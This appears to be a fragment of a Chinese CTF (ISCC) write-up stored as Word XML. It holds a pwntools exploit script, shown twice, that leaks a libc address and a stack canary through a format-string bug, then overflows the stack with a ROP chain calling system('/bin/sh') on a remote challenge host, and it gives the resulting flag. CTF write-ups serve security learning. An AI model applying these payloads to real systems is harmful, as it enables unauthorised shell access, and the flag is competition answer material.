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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+Flag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利用格式化字符串漏洞泄露libc地址和canary，然后利用栈溢出打rop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先得用libcsearch确定libc版本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pwn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ctypes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struct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pack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LibcSearcher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binary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"./pwn"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elf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ELF(binary)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ip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'182.92.237.102'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port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10012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local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local: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io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process(binary)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else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io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remote(ip, port)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context(log_level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'debug'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os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'linux'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arch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'amd64'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#context(log_level='debug', os='linux', arch='i386')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def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dbg():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gdb.attach(io)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pause()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发送数据的快捷方式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io.send(data)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sl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io.sendline(data)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text, data: io.sendafter(text, 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sla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text, data: io.sendlineafter(text, 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io.recv()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ru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text: io.recvuntil(text)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uu32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u32(io.recvuntil(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b"\xff"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)[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:].ljust(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uu64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u64(io.recvuntil(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b"\x7f"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)[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:].ljust(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b"\x00"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读取十六进制数的快捷方式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iuu32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iuu64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uheap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u64(io.recv(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打印日志的快捷方式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lg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io.success(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'%s -&gt; 0x%x'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(data,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eval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(data)))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进入交互模式的快捷方式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io.interactive()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"what's the content?"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构造payload，获取libc相关地址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b'%27$p.%19$p'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sl(payload)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b'0x'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libc_start_main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iuu32()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245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libc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LibcSearcher(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"__libc_start_main"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libc_start_main)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libcbase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libc_start_main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libc.dump(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"__libc_start_main"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'0x'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canary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iuu32()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system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libc.dump(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"system"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bin_sh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libc.dump(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"str_bin_sh"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ret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0x0804900e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"Input:"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构造payload，执行攻击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b'A'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0x88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p32(canary)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b'A'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0xc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p32(ret)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p32(system)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p32(bin_sh)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sl(payload)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ia()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解出：ISCC{38a24130-0a34-490b-836b-0442c858e5aa}</w:t>
      </w:r>
    </w:p>
    <w:p/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pwn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ctypes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struct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pack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LibcSearcher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binary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"./pwn"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elf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ELF(binary)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ip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'182.92.237.102'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port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10012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local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local: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io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process(binary)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else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io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remote(ip, port)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context(log_level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'debug'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os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'linux'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arch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'amd64'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#context(log_level='debug', os='linux', arch='i386')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def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dbg():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gdb.attach(io)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pause()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发送数据的快捷方式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io.send(data)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sl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io.sendline(data)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text, data: io.sendafter(text, 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sla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text, data: io.sendlineafter(text, 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io.recv()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ru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text: io.recvuntil(text)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uu32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u32(io.recvuntil(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b"\xff"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)[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:].ljust(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uu64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u64(io.recvuntil(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b"\x7f"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)[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:].ljust(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b"\x00"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读取十六进制数的快捷方式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iuu32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iuu64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uheap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u64(io.recv(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打印日志的快捷方式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lg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io.success(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'%s -&gt; 0x%x'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(data,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eval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(data)))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进入交互模式的快捷方式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io.interactive()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"what's the content?"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构造payload，获取libc相关地址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b'%27$p.%19$p'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sl(payload)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b'0x'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libc_start_main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iuu32()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245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libc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LibcSearcher(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"__libc_start_main"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libc_start_main)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libcbase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libc_start_main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libc.dump(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"__libc_start_main"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'0x'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canary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iuu32()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system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libc.dump(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"system"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bin_sh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libc.dump(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"str_bin_sh"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ret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0x0804900e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"Input:"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构造payload，执行攻击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b'A'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0x88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p32(canary)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b'A'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0xc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p32(ret)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p32(system)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p32(bin_sh)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sl(payload)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ia()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63E4CBB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autoRedefine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2024-05-14T03:39:46Z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